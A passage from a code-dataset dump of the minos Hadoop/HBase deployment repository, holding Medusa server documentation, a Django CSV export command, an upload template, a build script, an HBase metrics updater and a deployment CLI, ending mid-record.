'filesystem object' to\ngain access to a given directory tree. One possible server extension\ntechnique would be to build behavior into this filesystem object,\nrather than directly into the server: Then the extension could be\nshared with both the FTP and HTTP servers.\n\n<h3>HTTP</h3>\n\n<p>The core HTTP server itself is quite simple - all functionality is\nprovided through 'extensions'. Extensions can be plugged in\ndynamically. [i.e., you could log in to the server via the monitor\nservice and add or remove an extension on the fly]. The basic\nfile-delivery service is provided by a 'default' extension, which\nmatches all URI's. You can build more complex behavior by replacing\nor extending this class.\n\n\n<p>The default extension includes support for the 'Connection: Keep-Alive'\ntoken, and will re-use a client channel when requested by the client.\n\n<h3>FTP</h3>\n\n<p>On Unix, the ftp server includes support for 'real' users, so that it\nmay be used as a drop-in replacement for the normal ftp server. Since\nmost ftp servers on Unix use the 'forking' model, each child process\nchanges its user/group persona after a successful login. This is a\nappears to be a secure design.\n\n\n<p>Medusa takes a different approach - whenever Medusa performs an\noperation for a particular user [listing a directory, opening a file],\nit temporarily switches to that user's persona _only_ for the duration\nof the operation. [and each such operation is protected by a\ntry/finally exception handler].\n\n\n<p>To do this Medusa MUST run with super-user privileges. This is a\nHIGHLY experimental approach, and although it has been thoroughly\ntested on Linux, security problems may still exist. If you are\nconcerned about the security of your server machine, AND YOU SHOULD\nBE, I suggest running Medusa's ftp server in anonymous-only mode,\nunder an account with limited privileges ('nobody' is usually used for\nthis purpose).\n\n\n<p>I am very interested in any feedback on this feature, most\nespecially information on how the server behaves on different\nimplementations of Unix, and of course any security problems that are\nfound.\n\n<hr>\n\n<h3>Monitor</h3>\n\n<p>The monitor server gives you remote, 'back-door' access to your server\nwhile it is running. It implements a remote python interpreter. Once\nconnected to the monitor, you can do just about anything you can do from\nthe normal python interpreter. You can examine data structures, servers,\nconnection objects. You can enable or disable extensions, restart the server,\nreload modules, etc...\n\n<p>The monitor server is protected with an MD5-based authentication\nsimilar to that proposed in RFC1725 for the POP3 protocol. The server\nsends the client a timestamp, which is then appended to a secret\npassword. The resulting md5 digest is sent back to the server, which\nthen compares this to the expected result. Failed login attempts are\nlogged and immediately disconnected. The password itself is not sent\nover the network (unless you have foolishly transmitted it yourself\nthrough an insecure telnet or X11 session. 8^)\n\n<p>For this reason telnet cannot be used to connect to the monitor\nserver when it is in a secure mode (the default). A client program is\nprovided for this purpose. You will be prompted for a password when\nstarting up the server, and by the monitor client.\n\n<p>For extra added security on Unix, the monitor server will\neventually be able to use a Unix-domain socket, which can be protected\nbehind a 'firewall' directory (similar to the InterNet News server).\n\n<hr>\n<h2>Performance Notes</h2>\n\n<h3>The <code>select()</code> function</h3>\n\n<p>At the heart of Medusa is a single <code>select()</code> loop.\nThis loop handles all open socket connections, both servers and\nclients. It is in effect constantly asking the system: 'which of\nthese sockets has activity?'. Performance of this system call can\nvary widely between operating systems.\n\n<p>There are also often builtin limitations to the number of sockets\n('file descriptors') that a single process, or a whole system, can\nmanipulate at the same time. Early versions of Linux placed draconian\nlimits (256) that have since been raised. Windows 95 has a limit of\n64, while OSF/1 seems to allow up to 4096.\n\n<p>These limits don't affect only Medusa, you will find them described\nin the documentation for other web and ftp servers, too.\n\n<p>The documentation for the Apache web server has some excellent\nnotes on tweaking performance for various Unix implementations. See\n<a href=\"http://www.apache.org/docs/misc/perf.html\">\nhttp://www.apache.org/docs/misc/perf.html</a>\nfor more information.\n\n<h3>Buffer sizes</h3>\n\n<p>\nThe default buffer sizes used by Medusa are set with a bias toward\nInternet-based servers: They are relatively small, so that the buffer\noverhead for each connection is low. The assumption is that Medusa\nwill be talking to a large number of low-bandwidth connections, rather\nthan a smaller number of high bandwidth.\n\n<p>This choice trades run-time memory use for efficiency - the down\nside of this is that high-speed local connections (i.e., over a local\nethernet) will transfer data at a slower rate than necessary.\n\n<p>This parameter can easily be tweaked by the site designer, and can\nin fact be adjusted on a per-server or even per-client basis. For\nexample, you could have the FTP server use larger buffer sizes for\nconnections from certain domains.\n\n<p>If there's enough interest, I have some rough ideas for how to make\nthese buffer sizes automatically adjust to an optimal setting. Send\nemail if you'd like to see this feature.\n\n<hr>\n\n<p>See <a href=\"medusa.html\">./medusa.html</a> for a brief overview of\nsome of the ideas behind Medusa's design, and for a description of\ncurrent and upcoming features.\n\n<p><h3>Enjoy!</h3>\n\n<hr>\n<br>-Sam Rushing\n<br><a href=\"mailto:[email protected]\">[email protected]</a>\n\n<!--\n Local Variables:\n indent-use-tabs: nil\n end:\n-->\n\n</body>\n</html>\n"
},
{
"alpha_fraction": 0.7069271802902222,
"alphanum_fraction": 0.7069271802902222,
"avg_line_length": 22.45833396911621,
"blob_id": "1dfe0d51b16a86f22b1bf87edbd377bc6d083666",
"content_id": "e4ae240f6ea97685ac821876e4d6b54a48ef1ef8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 563,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 24,
"path": "/owl/machine/management/commands/dump_machine_list.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import csv\nimport logging\nimport sys\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom machine.models import Machine\n\n\nlogger = logging.getLogger(__name__)\n\nMACHINE_FIELDS = (\n 'hostname', 'ip', 'idc', 'rack', 'cores', 'ram',\n 'disks', 'disk_capacity', 'ssds', 'ssd_capacity'\n)\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n writer = csv.DictWriter(sys.stdout, MACHINE_FIELDS)\n writer.writeheader()\n writer.writerows(\n Machine.objects.order_by('hostname').values(*MACHINE_FIELDS))\n"
},
{
"alpha_fraction": 0.5010799169540405,
"alphanum_fraction": 0.5010799169540405,
"avg_line_length": 25.457143783569336,
"blob_id": "06f41f2a54ee9daaa22fdbded10c0d9de7f58145",
"content_id": "2704a8d2017ff2a49d7ac7ce18d3a65a5054bc24",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 926,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 35,
"path": "/tank/templates/upload.html",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n{% block content %}\n\n{% if upload_success %}\n <div>\n <p>Packakge {{ package.name }} upload successfully!</p>\n </div>\n{% elif error_message %}\n <p>Upload failed: {{ error_message }}</p>\n{% else %}\n <div>\n <form action=\".\" method=\"post\" enctype=\"multipart/form-data\">\n <table>\n <tr>\n <td>Artifact</td>\n <td><input type=\"text\" name=\"artifact\" id=\"artifact\"></td>\n </tr>\n <tr>\n <td>Revison</td>\n <td><input type=\"text\" name=\"revision\" id=\"revision\"></td>\n </tr>\n <tr>\n <td>File</td>\n <td><input type=\"file\" name=\"file\" id=\"file\"></td>\n </tr>\n <tr>\n <td><button type=\"submit\" class=\"btn btn-primary\">Upload</button></td>\n <td><button type=\"reset\" class=\"btn btn-default\">Reset</button></td>\n </tr>\n </table>\n </form>\n </div>\n{% endif %}\n\n{% endblock %}\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.5923076868057251,
"avg_line_length": 30.200000762939453,
"blob_id": "41cb000038ad732c54cb68647b7a1c9b315b3990",
"content_id": "12ad5f34cc47a8c329991919578931d675037f7f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 780,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 25,
"path": "/build.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nsource \"$(dirname $0)\"/build/minos_env.sh || exit 1\n\nif [ $# -lt 1 ]; then\n echo -e \"Usage: $0 command [component]\\n\" \\\n \"command\\n\" \\\n \"'build' : to build the virtual environment.\\n\" \\\n \"'start' : to start a Minos component.\\n\" \\\n \"'stop' : to stop a Minos component.\\n\" \\\n \"component\\n\" \\\n \"'tank' : the package server.\\n\" \\\n \"'supervisor' : the processes monitor component.\\n\" \\\n \"'owl' : the metrics management component.\"\n exit 2\nelif [ $1 = \"build\" ]; then\n $BUILD_VIRTUALENV_ENTRY $@\nelse\n if ! [ -x $ENV_PYTHON ]; then\n echo \"ERROR: please run './build.sh build' to build the virtual environment firstly.\"\n exit 3\n else\n PYTHONPATH=$CLIENT_ROOT $ENV_PYTHON $BUILD_COMPONENTS_ENTRY $@\n fi\nfi\n"
},
{
"alpha_fraction": 0.6545779705047607,
"alphanum_fraction": 0.6552284955978394,
"avg_line_length": 41.11643981933594,
"blob_id": "382e6822d6645f37e4b74cab754a6a5b365c1ad6",
"content_id": "01391eb0c40f3563a4d683589415682c58c9d5ea",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12298,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 292,
"path": "/owl/collector/management/commands/metrics_updater.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import Queue\nimport datetime\nimport json\nimport logging\nimport os\nimport socket\nimport time\nimport traceback\n\nfrom collect_utils import METRIC_TASK_TYPE, STATUS_TASK_TYPE, AGGREGATE_TASK_TYPE\nfrom collect_utils import QueueTask\nfrom django.db import connection\nfrom monitor import dbutil\nfrom monitor import metric_helper\nfrom monitor.models import Region, RegionServer, Table, HBaseCluster\n\nREGION_SERVER_DYNAMIC_STATISTICS_BEAN_NAME = \"hadoop:service=RegionServer,\" \\\n \"name=RegionServerDynamicStatistics\"\nREGION_SERVER_BEAN_NAME = \"hadoop:service=RegionServer,name=RegionServer\"\nREGION_SERVER_REPLICATION_BEAN_NAME_PREFIX = \"hadoop:service=Replication,\" \\\n \"name=ReplicationSource for\"\n\nBOOL_METRIC_MAP = {\n \"tag.IsOutOfSync\": \"true\",\n \"tag.HAState\": \"active\",\n}\n\nHBASE_AGGREGATED_METRICS_KEY = ['memStoreSizeMB',\n 'storefileSizeMB',\n 'readRequestsCount',\n 'writeRequestsCount',\n 'readRequestsCountPerSec',\n 'writeRequestsCountPerSec',\n ]\n\nlogger = logging.getLogger(__name__)\n\n# global functions for subprocesses to handling metrics\ndef reset_aggregated_metrics(record):\n for key in HBASE_AGGREGATED_METRICS_KEY:\n setattr(record, key, 0)\n\ndef aggregate_metrics(from_record, to_record):\n for key in HBASE_AGGREGATED_METRICS_KEY:\n old_value = getattr(to_record, key)\n setattr(to_record, key, old_value + getattr(from_record, key))\n\ndef analyze_hbase_region_server_metrics(metric_task, metrics):\n region_server_name = None\n region_operation_metrics_dict = {}\n replication_metrics_dict = {}\n for bean in metrics['beans']:\n try:\n # because root and meta region have the names, we must use region server\n # name and region name to locate a region\n if bean['name'] == REGION_SERVER_BEAN_NAME:\n region_server_name = bean['ServerName']\n elif bean['name'] == REGION_SERVER_DYNAMIC_STATISTICS_BEAN_NAME:\n for metricName in bean.keys():\n if Region.is_region_operation_metric_name(metricName):\n encodeName = Region.get_encode_name_from_region_operation_metric_name(metricName)\n region_operation_metrics = region_operation_metrics_dict.setdefault(encodeName, {})\n region_operation_metrics[metricName] = bean[metricName]\n elif bean['name'].startswith(REGION_SERVER_REPLICATION_BEAN_NAME_PREFIX):\n peerId = metric_helper.parse_replication_source(bean['name'])\n replication_metrics = replication_metrics_dict.setdefault(peerId, {})\n for metricName in bean.keys():\n replication_metrics[metricName] = bean[metricName]\n except Exception as e:\n logger.warning(\"%r failed to analyze metrics: %r\", metric_task, e)\n continue\n\n region_server = None\n if region_server_name is None:\n return\n else:\n try:\n region_server = RegionServer.objects.get(name = region_server_name)\n except RegionServer.DoesNotExist:\n logger.warning(\"%r failed to find region_server with region_server_name=%s\",\n metric_task, region_server_name)\n return\n\n # save replication metrics for region server\n region_server.replication_last_attempt_time = metric_task.last_attempt_time\n region_server.replicationMetrics = json.dumps(replication_metrics_dict)\n region_server.save()\n\n region_record_need_save = []\n for encodeName, operationMetrics in region_operation_metrics_dict.iteritems():\n region_record = dbutil.get_region_by_regionserver_and_encodename(\n region_server, encodeName)\n # we must wait region saved after analyzing master task\n if region_record is None:\n continue\n region_record.analyze_from_region_server_operation_metrics(operationMetrics,\n metric_task.last_attempt_time)\n # we first buffer the regions needed to update, then do batch update\n region_record_need_save.append(region_record)\n\n # we do batch update\n begin = datetime.datetime.now()\n dbutil.update_regions_for_region_server_metrics(region_record_need_save)\n logger.info(\"%r batch save region record for region_server, \" \\\n \"saved regions=%d, consume=%s\",\n metric_task, len(region_record_need_save),\n str((datetime.datetime.now() - begin).total_seconds()))\n\ndef get_host_and_port_from_region_server_name(rs_name):\n # rs name format is formatted as : host_name,port,start_code.\n # for some cluster, the format may be : host_ip,port,start_code.\n # we will try to convert host_ip to coprresonding host_name\n # because we always try to save host_name and port to identity a task\n # except that we can't get host_name from host_ip\n tokens = rs_name.split(',')\n host = tokens[0] # may be host_name or host_ip\n host_name = None\n try:\n host_name = socket.gethostbyaddr(host)[0]\n except:\n logger.warning(\"can't get host_name for host=%s\", host)\n host_name = host\n # jmx port is rs_port + 1, host and jmx port will identify a task\n port = int(tokens[1]) + 1\n return [host_name, port]\n\ndef analyze_hbase_master_metrics(metric_task, metrics):\n cluster = metric_task.job.cluster\n hbase_cluster_record, created = HBaseCluster.objects.get_or_create(cluster=cluster)\n reset_aggregated_metrics(hbase_cluster_record)\n tables = {}\n region_record_need_save = []\n for bean in metrics['beans']:\n try:\n if 'RegionServers' not in bean:\n continue\n for rs_metrics in bean['RegionServers']:\n rs_name = rs_metrics['key']\n [rs_hostname, rs_port] = get_host_and_port_from_region_server_name(rs_name)\n rs_task = dbutil.get_task_by_host_and_port(rs_hostname, rs_port)\n rs_record, created = RegionServer.objects.get_or_create(cluster = cluster,\n task = rs_task)\n # region server name includes startTime, which means the same region server\n # will lead different RegionServer records if the region server restarts.\n # Therefore, we won't create region server by its name.\n rs_record.name = rs_name\n\n rs_value = rs_metrics['value']\n rs_record.last_attempt_time = metric_task.last_attempt_time\n rs_record.load = int(rs_value['load'])\n rs_record.numberOfRegions = int(rs_value['numberOfRegions'])\n reset_aggregated_metrics(rs_record)\n\n # we read out all regions belong to this region server and build a map\n all_regions_in_rs = Region.objects.filter(region_server = rs_record)\n all_regions_in_rs = dbutil.get_alive_regions_by_rs(rs_record)\n all_regions_map = {}\n logger.info(\"%r Finish get region: %d\", metric_task, len(all_regions_in_rs))\n for region in all_regions_in_rs:\n all_regions_map[region.name] = region\n\n regionsLoad = rs_value['regionsLoad']\n for region_metrics in regionsLoad:\n region_value = region_metrics['value']\n region_name = region_value['nameAsString']\n try:\n table_name = region_name.split(',')[0]\n except Exception as e:\n logger.warning(\"%r failed to get region name: %r, %s\",\n metric_task, e, region_name)\n continue\n\n region_metrics = {}\n\n if table_name not in tables:\n table_record, created = Table.objects.get_or_create(cluster = cluster,\n name = table_name)\n reset_aggregated_metrics(table_record)\n tables[table_name] = table_record\n\n table_record = tables[table_name]\n\n region_record = None\n if region_name in all_regions_map:\n region_record = all_regions_map[region_name]\n else:\n # if region record not in buffer, we get_or_create from db\n begin = datetime.datetime.now()\n region_record, created = Region.objects.get_or_create(table = table_record,\n name = region_name, encodeName = Region.get_encode_name(region_name),\n defaults={\"region_server\":rs_record})\n logger.info(\"%r get_or_create region in region_server from mysql, \" \\\n \"consume=%s, region_name=%s, buffered_rs=%s, get_rs=%s\",\n metric_task, str((datetime.datetime.now() - begin).total_seconds()),\n region_name, rs_record.name, region_record.region_server.name)\n\n\n logger.info(\"%r Finish analyze regionsLoad\", metric_task)\n\n region_record.region_server = rs_record\n region_record.analyze_region_record(region_value,\n metric_task.last_attempt_time)\n # we buffer the regions needed update for batch update\n region_record_need_save.append(region_record)\n aggregate_metrics(region_record, rs_record)\n aggregate_metrics(region_record, table_record)\n aggregate_metrics(region_record, hbase_cluster_record)\n\n rs_record.save()\n\n for table_record in tables.itervalues():\n table_record.last_attempt_time = metric_task.last_attempt_time\n table_record.availability = dbutil.getTableAvailability(\n table_record.cluster.name, table_record.name)\n table_record.save()\n\n hbase_cluster_record.save()\n\n # do batch update\n begin = datetime.datetime.now()\n dbutil.update_regions_for_master_metrics(region_record_need_save)\n logger.info(\"%r batch save region record for master, \" \\\n \"saved regions=%d, consume=%s\",\n metric_task, len(region_record_need_save),\n str((datetime.datetime.now() - begin).total_seconds()))\n except Exception as e:\n traceback.print_exc()\n logger.warning(\"%r failed to analyze metrics: %r\", metric_task, e)\n continue\n\ndef analyze_metrics(metric_task, metrics):\n if 'beans' not in metrics:\n return\n # analyze hbase metric\n if metric_task.job.cluster.service.name == 'hbase':\n start_time = time.time()\n if metric_task.job.name == 'master':\n analyze_hbase_master_metrics(metric_task, metrics)\n elif metric_task.job.name == 'regionserver':\n analyze_hbase_region_server_metrics(metric_task, metrics)\n\n logger.info(\"%r spent %f seconds for analyzing metrics for hbase\",\n metric_task, time.time() - start_time)\n\ndef update_metrics_in_process(output_queue, metric_task):\n try:\n logger.info(\"Updating metrics in process %d\", os.getpid())\n # get the metrics raw data from task.last_metrics_raw\n metricsRawData = metric_task.last_metrics_raw\n\n start_time = time.time()\n # analyze the metric if needed\n if metric_task.need_analyze:\n if metricsRawData:\n metrics = json.loads(metricsRawData)\n metrics_saved = {}\n for bean_output in metrics[\"beans\"]:\n bean_name = bean_output[\"name\"]\n for metric_name, metric_value in bean_output.iteritems():\n if metric_name in [\"name\", \"modelerType\"]:\n continue\n metric_type = type(metric_value)\n # Do some hadoop/hbase specific work :)\n if metric_name in BOOL_METRIC_MAP:\n metric_value = int(metric_value == BOOL_METRIC_MAP[metric_name])\n elif metric_type is list or metric_type is dict:\n # Just store the length.\n metric_value = len(metric_value)\n elif metric_type is bool:\n metric_value = int(metric_value)\n elif metric_value is None:\n metric_value = 0\n elif not (metric_type is int or metric_type is float\n or metric_type is unicode or metric_type is str):\n logger.warning(\"Unexpected metric type %s/%s: %r/%r\",\n bean_name, metric_name, metric_type, metric_value)\n continue\n\n group = metrics_saved.setdefault(bean_name, {})\n group[metric_name] = metric_value\n metric_task.last_metrics = json.dumps(metrics_saved)\n\n analyze_metrics(metric_task, metrics)\n\n metric_task.save()\n logger.info(\"%r spent %f seconds for saving task status\",\n metric_task, time.time() - start_time)\n # just put the corresponding metric_source id back to the output queue\n output_queue.put(QueueTask(METRIC_TASK_TYPE, metric_task.metric_source_id))\n except Exception, e:\n logger.warning(\"%r failed to update metric: %r\", metric_task, e)\n traceback.print_exc()\n"
},
{
"alpha_fraction": 0.7128392457962036,
"alphanum_fraction": 0.7135199308395386,
"avg_line_length": 39.80902862548828,
"blob_id": "6c0ac5e6316942184e404b0120215bdbd431482c",
"content_id": "faa51b2bf2b1ad1c8ba22fe7e1ac56d449d1569d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11753,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 288,
"path": "/client/deploy.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport platform\nimport pwd\nimport sys\n\nimport deploy_hbase\nimport deploy_hdfs\nimport deploy_utils\nimport deploy_zookeeper\nimport deploy_yarn\nimport deploy_impala\nimport deploy_kafka\nimport deploy_storm\nimport deploy_fds\nimport deploy_chronos\nimport deploy_mapreduce\n\nfrom log import Log\n\nSERVICE_DEPLOY_TOOL_MAP = {\n \"hdfs\": deploy_hdfs,\n \"yarn\": deploy_yarn,\n \"hbase\": deploy_hbase,\n \"zookeeper\": deploy_zookeeper,\n \"impala\": deploy_impala,\n \"kafka\": deploy_kafka,\n \"storm\": deploy_storm,\n \"fds\": deploy_fds,\n \"chronos\": deploy_chronos,\n \"mapreduce\": deploy_mapreduce,\n}\n\nLOG_LEVEL_RANGE_MAP = [\n \"trace\", \"debug\", \"info\", \"warn\", \"error\", \"fatal\"\n]\n\ndef add_service_arguments(parser):\n # NOTE: add_service_arguments must be called lastly.\n parser.add_argument(\"service\",\n choices=SERVICE_DEPLOY_TOOL_MAP.keys(),\n help=\"The service type to be deployed.\")\n parser.add_argument(\"cluster\",\n help=\"The cluster name where the service would be deployed.\")\n parser.add_argument(\"--job\", type=str, nargs=\"+\",\n help=\"The list of jobs to be manipulated, separated by space. If empty, \"\n \"all jobs would be manipulated.\")\n parser.add_argument(\"--log_level\", type=str, default=\"\",\n choices=LOG_LEVEL_RANGE_MAP,\n help=\"The global log level to be configured for the service.\")\n parser.add_argument(\"--thread_num\", type=int, default=1,\n help=\"The number of threads used to deploy data nodes parallelly.\")\n task_group = parser.add_mutually_exclusive_group()\n task_group.add_argument(\"--task\", type=str, nargs=\"+\",\n help=\"The list of tasks to be manipulated, separated by space. If task \"\n \"and host are all empty, all tasks would be manipulated. \"\n \"Option --task is exclusive with --host.\")\n task_group.add_argument(\"--host\", type=str, nargs=\"+\",\n help=\"The list of task hosts to be manipulated, separated by space. If \"\n \"task and host are all empty, all tasks would be manipulated. \"\n \"Option --task is exclusive with --host. \"\n \"--host option is only supported in hbase cluster now.\")\n\ndef parse_command_line():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Manage the hadoop cluster.\")\n\n parser.add_argument(\"--version\", action=\"version\",\n version=\"%(prog)s 1.0.0-beta\")\n parser.add_argument(\"-v\", \"--verbosity\", default=0, type=int,\n help=\"The verbosity level of log, higher value, more details.\")\n\n parser.add_argument(\"--remote_user\", default=\"work\",\n help=\"The user to login remote machines.\")\n\n subparsers = parser.add_subparsers(\n title=\"commands\",\n help=\"Type '%(prog)s command -h' to get more help for individual \"\n \"command.\")\n\n sub_parser = subparsers.add_parser(\n \"install\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Install binary packages to a cluster according to specified \"\n \"configuration. Only binary package (tarball) would be installed, \"\n \"config files and start/stop scripts would NOT be installed.\")\n sub_parser.add_argument(\"--make_current\", action=\"store_false\",\n help=\"Make the installed pacakge as current version.\")\n # NOTE: add_service_arguments must be called lastly.\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_install)\n\n sub_parser = subparsers.add_parser(\n \"cleanup\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Cleanup all data files of a service. Used when you want to \"\n \"re-deploy a service and discard all old data.\\n\"\n \"NOTE: before using it, make sure you know what's going to happen!\")\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_cleanup)\n\n sub_parser = subparsers.add_parser(\n \"bootstrap\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Bootstrap a new cluster for a service. \"\n \"It would fail if old data of this service exists.\")\n add_specify_version_options(sub_parser)\n sub_parser.add_argument(\"--update_config\", action=\"store_true\",\n default=False, help=\"Update the config files\")\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_bootstrap)\n\n sub_parser = subparsers.add_parser(\n \"start\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Start whole service on the specified cluster. Config files and \"\n \"control scripts (start/stop/restart, etc) would be generated at \"\n \"this phase and copied to destination hosts.\")\n add_specify_version_options(sub_parser)\n sub_parser.add_argument(\"--skip_confirm\", action=\"store_true\",\n default=False, help=\"Whether skip the confirmation or not\")\n sub_parser.add_argument(\"--update_config\", action=\"store_true\",\n default=False, help=\"Update the config files\")\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_start)\n\n sub_parser = subparsers.add_parser(\n \"stop\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Stop whole service on the specified cluster.\")\n add_service_arguments(sub_parser)\n sub_parser.add_argument(\"--skip_confirm\", action=\"store_true\",\n default=False, help=\"Whether skip the confirmation or not\")\n sub_parser.set_defaults(handler=process_command_stop)\n\n sub_parser = subparsers.add_parser(\n \"restart\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Restart whole service on the specified cluster.\")\n add_specify_version_options(sub_parser)\n sub_parser.add_argument(\"--skip_confirm\", action=\"store_true\",\n default=False, help=\"Whether skip the confirmation or not\")\n sub_parser.add_argument(\"--update_config\", action=\"store_true\",\n default=False, help=\"Update the config files\")\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_restart)\n\n sub_parser = subparsers.add_parser(\n \"show\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Show status of packages/services/jobs/tasks.\")\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_show)\n\n sub_parser = subparsers.add_parser(\n \"shell\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Run the shell of specified service %s\" % SERVICE_DEPLOY_TOOL_MAP.keys(),\n )\n add_specify_version_options(sub_parser)\n add_service_arguments(sub_parser)\n sub_parser.add_argument(\"command\", nargs=argparse.REMAINDER,\n help=\"The command to execute\")\n sub_parser.set_defaults(handler=process_command_shell)\n\n sub_parser = subparsers.add_parser(\n \"pack\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Pack client utilities of Hadoop/Hbase/Zookeeper for users\")\n add_specify_version_options(sub_parser)\n sub_parser.add_argument(\"--package_root\", default=\"./packages\",\n help=\"The local root to store the packed pacakges\")\n sub_parser.add_argument(\"--skip_tarball\", action=\"store_true\",\n help=\"Skip make the tarball of the packed package\")\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_pack)\n\n sub_parser = subparsers.add_parser(\n \"rolling_update\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Rolling update the specified job, users must specify \"\n \"the job through the --job option\")\n sub_parser.add_argument(\"--skip_confirm\", action=\"store_true\",\n default=False, help=\"Whether skip the confirmation or not\")\n sub_parser.add_argument(\"--vacate_rs\", action=\"store_true\",\n default=False, help=\"Whether to vacate region server before restart it\")\n sub_parser.add_argument(\"--time_interval\", default=120, type=int,\n help=\"The time interval between rolling update tasks\")\n sub_parser.add_argument(\"--update_config\", action=\"store_true\",\n default=False, help=\"Update the config files\")\n add_specify_version_options(sub_parser)\n add_service_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_rolling_update)\n\n args = parser.parse_args()\n Log.verbosity = args.verbosity\n return args\n\ndef add_specify_version_options(sub_parser):\n sub_parser.add_argument(\"--package_name\", default=\"\",\n help=\"Specify a package to bootstrap\")\n sub_parser.add_argument(\"--revision\", default=\"\",\n help=\"Specify a revision of a package to bootstrap, should be \"\n \"specified along with --package_name, otherwise, will be ignored\")\n sub_parser.add_argument(\"--timestamp\", default=\"\",\n help=\"Specify a timestamp of a package to bootstrap, should be \"\n \"specified along with --package_name and --revision, otherwise \"\n \"will be ignored\")\n sub_parser.add_argument(\"--update_package\", action=\"store_true\",\n help=\"Force the supervisor server to download the latest package from \"\n \"the package server, if the package_name, revsion and timestamp \"\n \"are specified, this option will be ignored\")\n\ndef process_command_install(args):\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.install(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_cleanup(args):\n deploy_utils.check_admin_priviledge(args)\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.cleanup(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_bootstrap(args):\n deploy_utils.check_admin_priviledge(args)\n args.update_config = True\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.bootstrap(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_start(args):\n deploy_utils.check_admin_priviledge(args)\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.start(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_stop(args):\n deploy_utils.check_admin_priviledge(args)\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.stop(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_restart(args):\n deploy_utils.check_admin_priviledge(args)\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.restart(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_show(args):\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.show(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_shell(args):\n deploy_utils.check_admin_priviledge(args)\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.run_shell(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_pack(args):\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.pack(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef process_command_rolling_update(args):\n deploy_utils.check_admin_priviledge(args)\n deploy_tool = SERVICE_DEPLOY_TOOL_MAP.get(args.service)\n if deploy_tool:\n return deploy_tool.rolling_update(args)\n Log.print_critical(\"Not implemented for service: %s\", args.service)\n\ndef main():\n args = parse_command_line()\n return args.handler(args)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5547396540641785,
"alphanum_fraction": 0.564752995967865,
"avg_line_length": 31.21505355834961,
"blob_id": "1264b91e9ed528083d7ea94b185c82d4a67baad4",
"content_id": "da598d880960f938a4a61d718ae1d62c1a1c8fe6",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
